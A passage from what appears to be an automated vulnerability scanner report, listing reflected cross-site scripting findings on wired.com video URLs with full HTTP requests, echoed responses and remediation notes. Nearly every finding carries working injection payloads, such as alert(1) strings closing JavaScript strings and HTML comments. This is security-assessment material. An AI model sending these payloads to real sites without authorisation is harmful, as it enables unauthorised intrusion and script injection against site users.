Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:11 GMT
Date: Mon, 22 Nov 2010 00:46:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "171644057459286"-alert(1)-"69a9f6b985b","latest-videos","disneys-cars-2-goes-international","677756918001","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.989. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b7af"-alert(1)-"c7c42779efd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international6b7af"-alert(1)-"c7c42779efd/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:51:09 GMT
Date: Mon, 22 Nov 2010 00:46:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","disneys-cars-2-goes-international6b7af"-alert(1)-"c7c42779efd","677756918001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.990. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f751c"-alert(1)-"9e4be7cf9e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001f751c"-alert(1)-"9e4be7cf9e3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:51:36 GMT
Date: Mon, 22 Nov 2010 00:46:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","677756918001f751c"-alert(1)-"9e4be7cf9e3","disneys-cars-2-goes-international","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.991. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bbeb0--><script>alert(1)</script>92733e52164 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29479
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:20 GMT
Date: Mon, 22 Nov 2010 00:45:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001
-->
...[SNIP]...

1.992. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe95"><a>e214857df01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videocfe95"><a>e214857df01/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29444
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:44 GMT
Date: Mon, 22 Nov 2010 00:44:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videocfe95"><a>e214857df01 ss_latest-videos c_highlights">
...[SNIP]...

1.993. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2b9"><a>01f61234896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos7e2b9"><a>01f61234896/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:31 GMT
Date: Mon, 22 Nov 2010 00:45:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos7e2b9"><a>01f61234896 c_highlights">
...[SNIP]...

1.994. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ba47"-alert(1)-"40453ca693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos7ba47"-alert(1)-"40453ca693/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:51:17 GMT
Date: Mon, 22 Nov 2010 00:46:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos7ba47"-alert(1)-"40453ca693","glab-galaxy-tab-windows-phone-7-boxee-box","1716440574","highlights","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.995. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a937"><a>62e50e68a4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights1a937"><a>62e50e68a4c/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:32 GMT
Date: Mon, 22 Nov 2010 00:46:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights1a937"><a>62e50e68a4c">
...[SNIP]...

1.996. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9420"-alert(1)-"98c086f2364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlightsf9420"-alert(1)-"98c086f2364/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:37 GMT
Date: Mon, 22 Nov 2010 00:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "highlightsf9420"-alert(1)-"98c086f2364","latest-videos","glab-galaxy-tab-windows-phone-7-boxee-box","1716440574","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.997. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e96d"-alert(1)-"764235caa89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/17164405742e96d"-alert(1)-"764235caa89/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:50 GMT
Date: Mon, 22 Nov 2010 00:47:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "17164405742e96d"-alert(1)-"764235caa89","latest-videos","glab-galaxy-tab-windows-phone-7-boxee-box","highlights","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.998. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed62f"-alert(1)-"b13676a10a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-boxed62f"-alert(1)-"b13676a10a0/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:59 GMT
Date: Mon, 22 Nov 2010 00:47:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","glab-galaxy-tab-windows-phone-7-boxee-boxed62f"-alert(1)-"b13676a10a0","1716440574","highlights","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.999. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1450"-alert(1)-"c5b613f454c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001a1450"-alert(1)-"c5b613f454c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:09 GMT
Date: Mon, 22 Nov 2010 00:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "673489628001a1450"-alert(1)-"c5b613f454c","latest-videos","glab-galaxy-tab-windows-phone-7-boxee-box","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1000. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9df2e--><script>alert(1)</script>c0a6c52dd39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29470
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:50 GMT
Date: Mon, 22 Nov 2010 00:42:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001
-->
...[SNIP]...

1.1001. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15f7a"><a>14ac02a74d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video15f7a"><a>14ac02a74d2/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

